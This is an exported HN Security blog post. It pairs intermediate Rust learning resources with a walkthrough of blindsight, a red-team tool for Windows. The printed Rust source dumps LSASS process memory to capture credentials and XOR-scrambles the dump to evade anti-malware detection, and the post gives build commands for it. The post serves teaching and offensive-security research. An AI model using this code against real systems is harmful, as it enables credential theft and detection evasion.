{"id":3576,"date":"2024-12-10T08:28:16","date_gmt":"2024-12-10T07:28:16","guid":{"rendered":"https:\/\/security.humanativaspa.it\/?p=3576"},"modified":"2025-10-21T09:08:11","modified_gmt":"2025-10-21T09:08:11","slug":"an-offensive-rust-encore","status":"publish","type":"post","link":"https:\/\/hnsecurity.it\/it\/blog\/an-offensive-rust-encore\/","title":{"rendered":"An offensive Rust encore"},"content":{"rendered":"<blockquote><p><em>&#8220;Give me alchemy, give me wizardry, give me sorcery, thermatology,<\/em><br \/>\n<em>Electricity, magic if you please, master all of these, bring him to his knees,<\/em><br \/>\n<em>I master five magics, I master five magics, I master five magics, I master five magics.<\/em><br \/>\n<em>&#8212; Megadeth, Five Magics (1990)<\/em><\/p><\/blockquote>\n<h3>Encore! Encore!<\/h3>\n<p>There&#8217;s so much to <a href=\"https:\/\/www.rust-lang.org\/\">Rust<\/a> and in my <a href=\"https:\/\/hnsecurity.it\/learning-rust-for-fun-and-backdoo-rs\">previous article<\/a> we barely scratched the surface of this <strong>powerful yet surprisingly approachable <\/strong>programming language. Yes, you read that right. Despite <a href=\"https:\/\/vorner.github.io\/difficult.html\">its reputation<\/a> as a difficult language, from the perspective of a somewhat experienced C programmer <strong>Rust is not that hard<\/strong>. Harder than <a href=\"https:\/\/go.dev\/learn\/\">Go<\/a>, sure, but definitely easier than <a href=\"https:\/\/github.com\/federico-busato\/Modern-CPP-Programming\">C++<\/a>. Then again, C++ is probably the most unnecessarily complex language around&#8230; But I digress.<\/p>\n<figure id=\"attachment_5102\" aria-describedby=\"caption-attachment-5102\" style=\"width: 600px\" class=\"wp-caption aligncenter\"><img decoding=\"async\" class=\"wp-image-5102\" src=\"https:\/\/hnsecurity.it\/wp-content\/uploads\/2024\/12\/missing-asterisk-e1737736325963-1.jpg\" alt=\"\" width=\"600\" height=\"472\" srcset=\"https:\/\/hnsecurity.it\/wp-content\/uploads\/2024\/12\/missing-asterisk-e1737736325963-1.jpg 879w, https:\/\/hnsecurity.it\/wp-content\/uploads\/2024\/12\/missing-asterisk-e1737736325963-1-300x236.jpg 300w, https:\/\/hnsecurity.it\/wp-content\/uploads\/2024\/12\/missing-asterisk-e1737736325963-1-768x604.jpg 768w, https:\/\/hnsecurity.it\/wp-content\/uploads\/2024\/12\/missing-asterisk-e1737736325963-1-350x275.jpg 350w\" sizes=\"(max-width: 600px) 100vw, 600px\" \/><figcaption id=\"caption-attachment-5102\" class=\"wp-caption-text\">C++ in all its glory<\/figcaption><\/figure>\n<p>So, Rust is approachable. Yet, as most programming languages and probably more so, Rust is hard to master. Following up on my <a href=\"https:\/\/hnsecurity.it\/learning-rust-for-fun-and-backdoo-rs\">previous work<\/a>, in this article I&#8217;ll provide some additional<strong>\u00a0learning resources<\/strong> for intermediate-level rustaceans, to help you travel a little further along your learning path. I&#8217;ll also introduce <strong>a new offensive security tool<\/strong> to showcase another practical application of this programming language that regularly polls as <a href=\"https:\/\/survey.stackoverflow.co\/2024\/technology#admired-and-desired\">one of the most loved<\/a> \ud83e\udd80<\/p>\n<h3>Soundtrack and learning materials<\/h3>\n<p>Let&#8217;s hack with a soundtrack! For this encore, I\u2019ve selected another thrash metal anthem, once again from <strong>Megadeth\u2019s classic album &#8220;Rust in Peace&#8221;<\/strong>: <a href=\"https:\/\/en.wikipedia.org\/wiki\/Master_of_the_Five_Magics\">Five Magics<\/a> \ud83e\udd18<\/p>\n<p><iframe title=\"[Full Album] M\u0332egade\u0332th - Ru\u0332st In Pe\u0332ace\" width=\"840\" height=\"473\" src=\"https:\/\/www.youtube.com\/embed\/Ti_imhKBjXA?start=925&#038;feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" referrerpolicy=\"strict-origin-when-cross-origin\" allowfullscreen><\/iframe><\/p>\n<p>As for the<strong>\u00a0learning materials<\/strong>, here&#8217;s a list of resources that should assist intermediate-level Rust developers in bringing their skills to the next level:<\/p>\n<ul>\n<li><a href=\"https:\/\/veykril.github.io\/tlborm\/\">The Little Book of Rust Macros<\/a>. On my first approach to Rust I had only skimmed over the topic of macros, but they can be the right tool for the job in a number of <a href=\"https:\/\/exercism.org\/tracks\/rust\/exercises\/space-age\/solutions\/0xdea\">scenarios<\/a>. This short book covers Rust macros with a lot of depth.<\/li>\n<li><a href=\"https:\/\/doc.rust-lang.org\/stable\/rust-by-example\/macros.html\">Rust by Example &#8211; macro_rules!<\/a> This is probably the best resource to quickly get up to speed with Rust macros, but see also the macros chapter in The Book, <a href=\"https:\/\/doc.rust-lang.org\/stable\/book\/ch19-06-macros.html\">here<\/a> and <a href=\"https:\/\/doc.rust-lang.org\/1.30.0\/book\/first-edition\/macros.html\">here<\/a> (the second link points to an outdated edition with some helpful details).<\/li>\n<li><a href=\"https:\/\/www.lurklurk.org\/effective-rust\/\">Effective Rust<\/a>. This book focuses on areas where Rust programmers tend to struggle. As such, it&#8217;s intended to be the <em>second<\/em> book that newcomers to Rust might need, after they have already familiarized themselves with the basics <a href=\"https:\/\/hnsecurity.it\/learning-rust-for-fun-and-backdoo-rs\">elsewhere<\/a>.<\/li>\n<li><a href=\"https:\/\/rust-unofficial.github.io\/patterns\/\">Rust Design Patterns<\/a>. A comprehensive collection of idiomatic, reusable, and tested solutions to commonly occurring problems in Rust software design.<\/li>\n<li><a href=\"https:\/\/rust-lang.github.io\/api-guidelines\/\">Rust API Guidelines<\/a>. A set of recommendations on how to design and present APIs for the Rust programming language, organized as a handy checklist. See also the <a href=\"https:\/\/doc.rust-lang.org\/std\/index.html\">Rust Standard Library documentation<\/a> and the full list of <a href=\"https:\/\/rust-lang.github.io\/rust-clippy\/stable\/index.html\">clippy lints<\/a>.<\/li>\n<li><a href=\"https:\/\/docs.google.com\/drawings\/u\/0\/d\/1EOPs0YTONo_FygWbuJGPfikO9Myt5HwtiFUHRuE1JVM\/preview?pli=1\">Rust Result\/Option Transformations<\/a>. Super useful diagram that explains possible transformations between <a href=\"https:\/\/doc.rust-lang.org\/stable\/std\/result\/\">Result<\/a> and <a href=\"https:\/\/doc.rust-lang.org\/stable\/std\/option\/\">Option<\/a> standard types and their interactions.<\/li>\n<li><a href=\"https:\/\/crates.io\/crates\/cargo-generate\">Cargo Generate<\/a>. I use this developer tool to create a <a href=\"https:\/\/github.com\/0xdea\/raptor-rust-template\">dynamic template<\/a> for starting my Rust projects. Check it out along with another useful cargo subcommand plugin: <a href=\"https:\/\/crates.io\/crates\/cargo-wizard\">Cargo Wizard<\/a>.<\/li>\n<li><a href=\"https:\/\/rhai.rs\/book\/index.html\">The Rhai Book<\/a>. Cargo Generate made me discover Rhai, an embedded scripting language and evaluation engine for Rust that provides a safe and easy way to add scripting to any application.<\/li>\n<li><a href=\"https:\/\/exercism.org\/tracks\/rust\">Rust Track on Exercism<\/a>. A free platform that provides coding exercises and mentoring to develop fluency in your chosen programming languages. I personally found it particularly useful to practice Rust&#8217;s <a href=\"https:\/\/www.lurklurk.org\/effective-rust\/iterators.html\">functional<\/a> <a href=\"https:\/\/exercism.org\/tracks\/rust\/exercises\/isbn-verifier\/solutions\/0xdea\">programming<\/a> style.<\/li>\n<li><a href=\"https:\/\/www.zero2prod.com\/\">Zero to Production in Rust<\/a>. An introduction to web API backend development in Rust that provides a good coverage of the whole language and its patterns, using a <a href=\"https:\/\/github.com\/0xdea\/zero2prod\">realistic project<\/a> as a concrete example. Much recommended!<\/li>\n<\/ul>\n<p>That&#8217;s a quite a lot of materials to study in depth! Take your time&#8230;<\/p>\n<p>There&#8217;s just one last thing before we can move on to the next topic. Let&#8217;s address the <a href=\"https:\/\/patchfriday.com\/50\/\">elephant in the room<\/a>, shall we? Rust protects you against undefined behavior, that&#8217;s true, but it has an obvious <strong>weak spot<\/strong>.<\/p>\n<figure id=\"attachment_4001\" aria-describedby=\"caption-attachment-4001\" style=\"width: 424px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/patchfriday.com\/43\/\"><img decoding=\"async\" class=\"wp-image-4001 size-full\" src=\"https:\/\/hnsecurity.it\/wp-content\/uploads\/2024\/08\/43-e1724328117716-1.png\" alt=\"\" width=\"424\" height=\"450\" srcset=\"https:\/\/hnsecurity.it\/wp-content\/uploads\/2024\/08\/43-e1724328117716-1.png 424w, https:\/\/hnsecurity.it\/wp-content\/uploads\/2024\/08\/43-e1724328117716-1-283x300.png 283w, https:\/\/hnsecurity.it\/wp-content\/uploads\/2024\/08\/43-e1724328117716-1-350x371.png 350w\" sizes=\"(max-width: 424px) 100vw, 424px\" \/><\/a><figcaption id=\"caption-attachment-4001\" class=\"wp-caption-text\">Software Security &#8211; https:\/\/patchfriday.com\/43\/<\/figcaption><\/figure>\n<p>If blindly trusting a lot of <a href=\"https:\/\/blog.rust-lang.org\/inside-rust\/2023\/09\/01\/crates-io-malware-postmortem.html\">external dependencies<\/a> gives you pause as it should, I recommend a few additional resources:<\/p>\n<ul>\n<li><a href=\"https:\/\/blessed.rs\/crates\">Blessed.rs<\/a>. An unofficial guide to the Rust ecosystem that aims to help developers in choosing useful crates that can be trusted to be included in their projects.<\/li>\n<li><a href=\"https:\/\/lib.rs\/\">Lib.rs<\/a>. Another curated alternative to crates.io with a powerful search that promotes stable, regularly updated, popular crates, and hides spam, abandoned, and otherwise untrusted crates.<\/li>\n<li><a href=\"https:\/\/crates.io\/crates\/cargo-deny\">cargo-deny<\/a>. A popular cargo plugin for linting dependencies and managing large dependency graphs, very useful either run on CI as a <a href=\"https:\/\/github.com\/EmbarkStudios\/cargo-deny-action\">GitHub Action<\/a>\u00a0or as a standalone tool.<\/li>\n<\/ul>\n<p>It&#8217;s now time to look at some actual code.<\/p>\n<h3>Introducing blindsight<\/h3>\n<p>This <a href=\"https:\/\/github.com\/0xdea\/blindsight\">little tool<\/a> takes its name from one of my all-time favorite <strong>hard science fiction novels<\/strong>: <a href=\"https:\/\/en.wikipedia.org\/wiki\/Blindsight_(Watts_novel)\">Blindsight by Peter Watts<\/a>. Space vampires, baby! \ud83e\ude90 \ud83e\udddb Seriously though, you should read it, you won&#8217;t be disappointed.<\/p>\n<blockquote><p><em>&#8220;There&#8217;s no such things as survival of the fittest.<\/em><br \/>\n<em>Survival of the most adequate, maybe.<\/em><br \/>\n<em>It doesn&#8217;t matter whether a solution&#8217;s optimal.<\/em><br \/>\n<em>All that matters is whether it beats the alternative.&#8221;<\/em><br \/>\n<em>&#8212; Peter Watts, Blindsight (2006)<\/em><\/p><\/blockquote>\n<p>Coming back to our tool, the use case is quite simple. Often, during red team engagements, after first access to the target is established the need to <strong>dump Windows credentials <\/strong>in Active Directory environments arises. There are <a href=\"https:\/\/attack.mitre.org\/techniques\/T1003\/001\/\">many<\/a> <a href=\"https:\/\/www.synacktiv.com\/en\/publications\/windows-secrets-extraction-a-summary\">techniques<\/a> and <a href=\"https:\/\/github.com\/fortra\/nanodump\">tools<\/a> to do this and I wanted to challenge myself to implement one of my own.<\/p>\n<p>Let&#8217;s see it in action. You can <strong>download and cross-compile blindsight<\/strong> as follows (macOS example):<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-linenumbers=\"false\" data-enlighter-theme=\"minimal\">raptor@fnord github % git clone https:\/\/github.com\/0xdea\/blindsight\r\nCloning into 'blindsight'...\r\n[...]\r\nraptor@fnord github % cd blindsight\r\nraptor@fnord blindsight % brew install mingw-w64\r\n[...]\r\nraptor@fnord blindsight % rustup target add x86_64-pc-windows-gnu\r\n[...]\r\nraptor@fnord blindsight % cargo build --release --target x86_64-pc-windows-gnu\r\n   Compiling proc-macro2 v1.0.86\r\n   Compiling unicode-ident v1.0.12\r\n   Compiling crossbeam-utils v0.8.20\r\n   Compiling windows_x86_64_gnu v0.52.6\r\n   Compiling winapi-x86_64-pc-windows-gnu v0.4.0\r\n   Compiling cfg-if v1.0.0\r\n   Compiling winapi v0.3.9\r\n   Compiling rayon-core v1.12.1\r\n   Compiling getrandom v0.2.15\r\n   Compiling ntapi v0.4.1\r\n   Compiling libc v0.2.155\r\n   Compiling rand_core v0.6.4\r\n   Compiling ppv-lite86 v0.2.17\r\n   Compiling either v1.13.0\r\n   Compiling memchr v2.7.4\r\n   Compiling rand_chacha v0.3.1\r\n   Compiling rand v0.8.5\r\n   Compiling quote v1.0.36\r\n   Compiling syn v2.0.71\r\n   Compiling windows-targets v0.52.6\r\n   Compiling windows-result v0.1.2\r\n   Compiling crossbeam-epoch v0.9.18\r\n   Compiling crossbeam-deque v0.8.5\r\n   Compiling rayon v1.10.0\r\n   Compiling windows-implement v0.57.0\r\n   Compiling windows-interface v0.57.0\r\n   Compiling windows-core v0.57.0\r\n   Compiling windows v0.57.0\r\n   Compiling sysinfo v0.31.4\r\n   Compiling blindsight v0.1.0 (\/Users\/raptor\/Downloads\/github\/blindsight)\r\n    Finished `release` profile [optimized] target(s) in 16.30s\r\nraptor@fnord blindsight % ls -l target\/x86_64-pc-windows-gnu\/release\/blindsight.exe\r\n-rwxr-xr-x@ 1 raptor  staff  378368 Nov  8 09:49 target\/x86_64-pc-windows-gnu\/release\/blindsight.exe*\r\nraptor@fnord blindsight %<\/pre>\n<p>Then, copy <strong>blindsight.exe<\/strong> to the target Windows box and run it inside an <strong>Administrator&#8217;s PowerShell window<\/strong>:<\/p>\n<p><img decoding=\"async\" class=\"aligncenter wp-image-4478 size-full\" src=\"https:\/\/hnsecurity.it\/wp-content\/uploads\/2024\/11\/Screenshot-2024-11-08-at-09.15.14-e1731071482994-1.png\" alt=\"\" width=\"1699\" height=\"1464\" srcset=\"https:\/\/hnsecurity.it\/wp-content\/uploads\/2024\/11\/Screenshot-2024-11-08-at-09.15.14-e1731071482994-1.png 1699w, https:\/\/hnsecurity.it\/wp-content\/uploads\/2024\/11\/Screenshot-2024-11-08-at-09.15.14-e1731071482994-1-300x259.png 300w, https:\/\/hnsecurity.it\/wp-content\/uploads\/2024\/11\/Screenshot-2024-11-08-at-09.15.14-e1731071482994-1-1024x882.png 1024w, https:\/\/hnsecurity.it\/wp-content\/uploads\/2024\/11\/Screenshot-2024-11-08-at-09.15.14-e1731071482994-1-768x662.png 768w, https:\/\/hnsecurity.it\/wp-content\/uploads\/2024\/11\/Screenshot-2024-11-08-at-09.15.14-e1731071482994-1-1536x1324.png 1536w, https:\/\/hnsecurity.it\/wp-content\/uploads\/2024\/11\/Screenshot-2024-11-08-at-09.15.14-e1731071482994-1-350x302.png 350w\" sizes=\"(max-width: 1699px) 100vw, 1699px\" \/><\/p>\n<p>The tool will <strong>write a scrambled dump to disk<\/strong>, in order to prevent detection of the LSASS memory dump by some anti-malware products. There are <a href=\"https:\/\/www.ired.team\/offensive-security\/credential-access-and-credential-dumping\/dumping-lsass-passwords-without-mimikatz-minidumpwritedump-av-signature-bypass\">many possible ways<\/a> to thwart detection: I chose to simply <strong>XOR the dump<\/strong> with a hardcoded key. To <strong>recover the original memory dump<\/strong>, you can run blindsight.exe again on your own machine passing the scrambled dump file as input:<\/p>\n<p><img decoding=\"async\" class=\"aligncenter wp-image-4487 size-full\" src=\"https:\/\/hnsecurity.it\/wp-content\/uploads\/2024\/11\/Screenshot-2024-11-08-at-14.13.05-e1731071662284-1.png\" alt=\"\" width=\"1700\" height=\"779\" srcset=\"https:\/\/hnsecurity.it\/wp-content\/uploads\/2024\/11\/Screenshot-2024-11-08-at-14.13.05-e1731071662284-1.png 1700w, https:\/\/hnsecurity.it\/wp-content\/uploads\/2024\/11\/Screenshot-2024-11-08-at-14.13.05-e1731071662284-1-300x137.png 300w, https:\/\/hnsecurity.it\/wp-content\/uploads\/2024\/11\/Screenshot-2024-11-08-at-14.13.05-e1731071662284-1-1024x469.png 1024w, https:\/\/hnsecurity.it\/wp-content\/uploads\/2024\/11\/Screenshot-2024-11-08-at-14.13.05-e1731071662284-1-768x352.png 768w, https:\/\/hnsecurity.it\/wp-content\/uploads\/2024\/11\/Screenshot-2024-11-08-at-14.13.05-e1731071662284-1-1536x704.png 1536w, https:\/\/hnsecurity.it\/wp-content\/uploads\/2024\/11\/Screenshot-2024-11-08-at-14.13.05-e1731071662284-1-350x160.png 350w\" sizes=\"(max-width: 1700px) 100vw, 1700px\" \/><\/p>\n<p>Finally, to <strong>retrieve the actual credentials<\/strong> you can use your favorite memory parser, such as <a href=\"https:\/\/github.com\/gentilkiwi\/mimikatz\">mimikatz<\/a>, <a href=\"https:\/\/github.com\/skelsec\/pypykatz\">pypykatz<\/a>, or even <a href=\"https:\/\/github.com\/volatilityfoundation\/volatility\">volatility<\/a>.<\/p>\n<h3>Code walkthrough<\/h3>\n<p>As it was the case with <a href=\"https:\/\/github.com\/0xdea\/backdoo-rs\">backdoo-rs<\/a>, blindsight is <strong>just little more than a toy<\/strong>&#8230; I haven&#8217;t used it during any actual engagement, &#8216;cause honestly we have better private tooling that can achieve the same goal and then some. Otherwise, I wouldn&#8217;t have been so quick to publish it \ud83e\udd2b<\/p>\n<figure id=\"attachment_4489\" aria-describedby=\"caption-attachment-4489\" style=\"width: 480px\" class=\"wp-caption aligncenter\"><img decoding=\"async\" class=\"wp-image-4489 size-full\" src=\"https:\/\/hnsecurity.it\/wp-content\/uploads\/2024\/11\/keepsilent-scaled-e1731073285550-1.jpg\" alt=\"\" width=\"480\" height=\"640\" srcset=\"https:\/\/hnsecurity.it\/wp-content\/uploads\/2024\/11\/keepsilent-scaled-e1731073285550-1.jpg 480w, https:\/\/hnsecurity.it\/wp-content\/uploads\/2024\/11\/keepsilent-scaled-e1731073285550-1-225x300.jpg 225w, https:\/\/hnsecurity.it\/wp-content\/uploads\/2024\/11\/keepsilent-scaled-e1731073285550-1-350x467.jpg 350w\" sizes=\"(max-width: 480px) 100vw, 480px\" \/><figcaption id=\"caption-attachment-4489\" class=\"wp-caption-text\">Know, and keep silent &#8211; #INFILTRATE19 badge<\/figcaption><\/figure>\n<p>Despite its lack of <a href=\"https:\/\/github.com\/0xdea\/blindsight\/tree\/master?tab=readme-ov-file#todo\">advanced anti-detection features<\/a>, blindsight&#8217;s <strong>EDR bypass rate<\/strong> that results from our tests is still somewhat better than I expected. However, I wouldn&#8217;t recommend using it in a real-life scenario. Still, I believe blindsight might be useful as an <strong>easy-to-understand proof-of-concept tool<\/strong> for those who are approaching Rust with an offensive mindset.<\/p>\n<p>Let&#8217;s take a look at the code to highlight the most interesting snippets.<\/p>\n<p>The <strong>main()<\/strong> function is pretty straightforward&#8230; let&#8217;s skip directly to the more juicy bits in <a href=\"https:\/\/github.com\/0xdea\/blindsight\/blob\/master\/src\/lib.rs\">lib.rs<\/a>. The <strong>run()<\/strong> function simply calls either <strong>dump()<\/strong> or <strong>unscramble()<\/strong> according to the action inferred by <strong>main()<\/strong> based on the provided command line:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"rust\" data-enlighter-theme=\"minimal\">\/\/\/ Dispatch to function implementing the selected action\r\npub fn run(action: &amp;str) -&gt; Result&lt;(), Box&lt;dyn Error&gt;&gt; {\r\n    match action {\r\n        \"dump\" =&gt; dump()?,\r\n        _ =&gt; unscramble(action)?,\r\n    }\r\n\r\n    Ok(())\r\n}<\/pre>\n<p>The <strong>dump()<\/strong> function creates an <strong>output file<\/strong> with a random name (lines 3-8 below), gets the <strong>LSASS process identifier<\/strong> via a helper function (lines 10-12), and then <strong>opens the process<\/strong> (lines 14-16).<\/p>\n<p>Afterwards, a somewhat convoluted <a href=\"https:\/\/learn.microsoft.com\/en-us\/windows\/win32\/fileio\/transactional-ntfs-portal\">technique<\/a> is employed to create an <strong>intermediate output file in memory<\/strong> as a transacted operation (lines 18-49) and <strong>dump LSASS memory<\/strong> to it using the classic <strong>MiniDumpWriteDump() <\/strong>Windows API function (lines 51-63). A view of this intermediate dump file is then <strong>mapped <\/strong>into the current address space (lines 65-71) and <strong>scrambled<\/strong> using a temporary vector to hold data (lines 73-83). Finally, the resulting scrambled dump is <strong>written to disk<\/strong> (lines 85-87).<\/p>\n<p>Note how there&#8217;s <a href=\"https:\/\/doc.rust-lang.org\/std\/fs\/struct.File.html\">no need to close files<\/a> in safe Rust code. Files are automatically closed when they go out of scope and errors detected on closing are ignored by default. Kinda weird, but that\u2019s the Rust way \ud83e\udd37<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"rust\" data-enlighter-theme=\"minimal\">\/\/\/ Dump LSASS memory to scrambled output file\r\nfn dump() -&gt; Result&lt;(), Box&lt;dyn Error&gt;&gt; {\r\n    \/\/ Create output file with a random name\r\n    let path = format!(\".\\\\{rand}.log\", rand = rand_str(8));\r\n    println!(\"[*] Trying to dump to output file: {path}\");\r\n    let path = PathBuf::from(path);\r\n    let mut out_file = File::create_new(path)?;\r\n    println!(\"[+] Successfully created output file\");\r\n\r\n    \/\/ Get LSASS pid\r\n    let pid = lsass_pid()?;\r\n    println!(\"[+] Found {LSASS} pid: {pid}\");\r\n\r\n    \/\/ Open LSASS process\r\n    let proc_handle = unsafe { OpenProcess(PROCESS_ALL_ACCESS, false, pid)? };\r\n    println!(\"[+] Successfully opened {LSASS} handle: {proc_handle:?}\");\r\n\r\n    \/\/ Create NTFS transaction object (TxF API)\r\n    let txf_handle = unsafe {\r\n        CreateTransaction(\r\n            ptr::null_mut(),\r\n            ptr::null_mut(),\r\n            0,\r\n            0,\r\n            0,\r\n            INFINITE,\r\n            PCWSTR(ptr::null_mut()),\r\n        )?\r\n    };\r\n\r\n    \/\/ Create intermediate output file as a transacted operation\r\n    let mut filename = format!(\".\\\\{rand}.log\", rand = rand_str(8));\r\n    let file_ptr = filename.as_mut_ptr();\r\n    let file_handle = unsafe {\r\n        CreateFileTransactedA(\r\n            PCSTR(file_ptr),\r\n            FILE_GENERIC_READ.0 | FILE_GENERIC_WRITE.0,\r\n            FILE_SHARE_WRITE,\r\n            None,\r\n            CREATE_NEW,\r\n            FILE_ATTRIBUTE_TEMPORARY | FILE_FLAG_DELETE_ON_CLOSE,\r\n            None,\r\n            txf_handle,\r\n            Some(std::ptr::from_ref::&lt;TXFS_MINIVERSION&gt;(\r\n                &amp;TXFS_MINIVERSION_DIRTY_VIEW,\r\n            )),\r\n            None,\r\n        )?\r\n    };\r\n\r\n    \/\/ Dump LSASS memory to intermediate output file\r\n    unsafe {\r\n        MiniDumpWriteDump(\r\n            proc_handle,\r\n            pid,\r\n            file_handle,\r\n            MiniDumpWithFullMemory,\r\n            None,\r\n            None,\r\n            None,\r\n        )?;\r\n    };\r\n    println!(\"[+] Dump successful!\");\r\n\r\n    \/\/ Map a view of the intermediate file into our address space\r\n    let map_handle = unsafe { CreateFileMappingW(file_handle, None, PAGE_READONLY, 0, 0, None)? };\r\n    let ptr = unsafe {\r\n        MapViewOfFile(map_handle, FILE_MAP_READ, 0, 0, 0)\r\n            .Value\r\n            .cast::&lt;u8&gt;()\r\n    };\r\n\r\n    \/\/ Scramble dump using a temporary vector to hold data\r\n    let size = unsafe { GetFileSize(file_handle, None) } as usize;\r\n    let data = unsafe { slice::from_raw_parts_mut(ptr, size) };\r\n    println!(\r\n        \"[*] Scrambling dump and writing {len} bytes to disk\",\r\n        len = data.len()\r\n    );\r\n\r\n    let mut dump = vec![0u8; size];\r\n    dump.clone_from_slice(data);\r\n    scramble(&amp;mut dump, KEY);\r\n\r\n    \/\/ Write scrambled dump to output file\r\n    let count = out_file.write(&amp;dump)?;\r\n    println!(\"[+] Done writing {count} bytes to disk!\");\r\n\r\n    \/\/ Cleanup\r\n    unsafe {\r\n        CloseHandle(map_handle)?;\r\n        CloseHandle(file_handle)?;\r\n        CloseHandle(txf_handle)?;\r\n        CloseHandle(proc_handle)?;\r\n    }\r\n\r\n    Ok(())\r\n}<\/pre>\n<p>The <strong>unscramble()<\/strong> function below is responsible for <strong>reading the scrambled dump file<\/strong> passed as an input (lines 8-13), <strong>unscrambling its contents<\/strong> by reversing the <strong>xor()<\/strong> operation implemented in the <strong>scramble()<\/strong> function (lines 15-20), and finally <strong>writing the clean dump<\/strong> to the <strong>lsass.dmp<\/strong> output file (lines 22-25):<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"rust\" data-enlighter-theme=\"minimal\">\/\/\/ Scramble a slice of bytes in place\r\nfn scramble(data: &amp;mut [u8], key: &amp;[u8]) {\r\n    xor(data, key);\r\n}\r\n\r\n\/\/\/ Unscramble a memory dump\r\nfn unscramble(path: &amp;str) -&gt; Result&lt;(), Box&lt;dyn Error&gt;&gt; {\r\n    \/\/ Open and read input file\r\n    println!(\"[*] Trying to read from input file: {path}\");\r\n    let mut in_file = File::open(path)?;\r\n    let mut buf = Vec::&lt;u8&gt;::new();\r\n    in_file.read_to_end(&amp;mut buf)?;\r\n    println!(\"[+] Successfully read from input file\");\r\n\r\n    \/\/ Unscramble dump\r\n    println!(\r\n        \"[*] Trying to unscramble {len} bytes to output file: {DUMP}\",\r\n        len = buf.len()\r\n    );\r\n    xor(buf.as_mut_slice(), KEY);\r\n\r\n    \/\/ Write unscrambled dump to output file\r\n    let mut out_file = File::create_new(DUMP)?;\r\n    let count = out_file.write(&amp;buf)?;\r\n    println!(\"[+] Done writing {count} bytes to disk!\");\r\n\r\n    Ok(())\r\n}\r\n\r\n\/\/\/ XOR a slice of bytes with a key in place\r\nfn xor(data: &amp;mut [u8], key: &amp;[u8]) {\r\n    data.iter_mut()\r\n        .zip(key.iter().cycle())\r\n        .for_each(|(byte, key_byte)| *byte ^= key_byte);\r\n}<\/pre>\n<p>That&#8217;s all for today! Nothing too fancy, and there&#8217;s definitely plenty of room for improvement, but it&#8217;s a start. You&#8217;re more than welcome to work on it to make it better, if you&#8217;re so inclined. So, go <strong>download blindsight<\/strong> here:<\/p>\n<ul>\n<li><a href=\"https:\/\/github.com\/0xdea\/blindsight\">https:\/\/github.com\/0xdea\/blindsight<\/a><\/li>\n<\/ul>\n<p>Afterwards, listen to some good tracks that make you hack harder, learn some cool new Rust tricks, and stay tuned. In the next installment of this <a href=\"https:\/\/hnsecurity.it\/tag\/rust\/\">series<\/a>, things will get more serious, as we will explore <strong>how to use Rust for vulnerability research<\/strong>.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>&#8220;Give me alchemy, give me wizardry, give me sorcery, thermatology, Electricity, magic if you please, master all of these, bring [&hellip;]<\/p>\n","protected":false},"author":3,"featured_media":159953,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"footnotes":""},"categories":[88,91],"tags":[207,208,134,135,191,206],"class_list":["post-3576","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-tools","category-articles","tag-mimikatz","tag-minidump","tag-tactical-exploitation","tag-windows","tag-red-teaming","tag-rust"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.6 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>HN Security - An offensive Rust encore -<\/title>\n<meta name=\"description\" content=\"Offensive Rust series article that introduces new learning resources and walks through the implementation of a red teaming tool (blindsight).\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/hnsecurity.it\/it\/blog\/an-offensive-rust-encore\/\" \/>\n<meta property=\"og:locale\" content=\"it_IT\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"HN Security - An offensive Rust encore -\" \/>\n<meta property=\"og:description\" content=\"Offensive Rust series article that introduces new learning resources and walks through the implementation of a red teaming tool (blindsight).\" \/>\n<meta property=\"og:url\" content=\"https:\/\/hnsecurity.it\/it\/blog\/an-offensive-rust-encore\/\" \/>\n<meta property=\"og:site_name\" content=\"HN Security\" \/>\n<meta property=\"article:published_time\" content=\"2024-12-10T07:28:16+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2025-10-21T09:08:11+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/hnsecurity.it\/wp-content\/uploads\/2025\/09\/RUST.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"1600\" \/>\n\t<meta property=\"og:image:height\" content=\"836\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Marco Ivaldi\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@hnsec\" \/>\n<meta name=\"twitter:site\" content=\"@hnsec\" \/>\n<meta name=\"twitter:label1\" content=\"Scritto da\" \/>\n\t<meta name=\"twitter:data1\" content=\"Marco Ivaldi\" \/>\n\t<meta name=\"twitter:label2\" content=\"Tempo di lettura stimato\" \/>\n\t<meta name=\"twitter:data2\" content=\"8 minuti\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/blog\\\/an-offensive-rust-encore\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/blog\\\/an-offensive-rust-encore\\\/\"},\"author\":{\"name\":\"Marco Ivaldi\",\"@id\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/#\\\/schema\\\/person\\\/89a4174c275f05d6148fb0fdedc8de4f\"},\"headline\":\"An offensive Rust 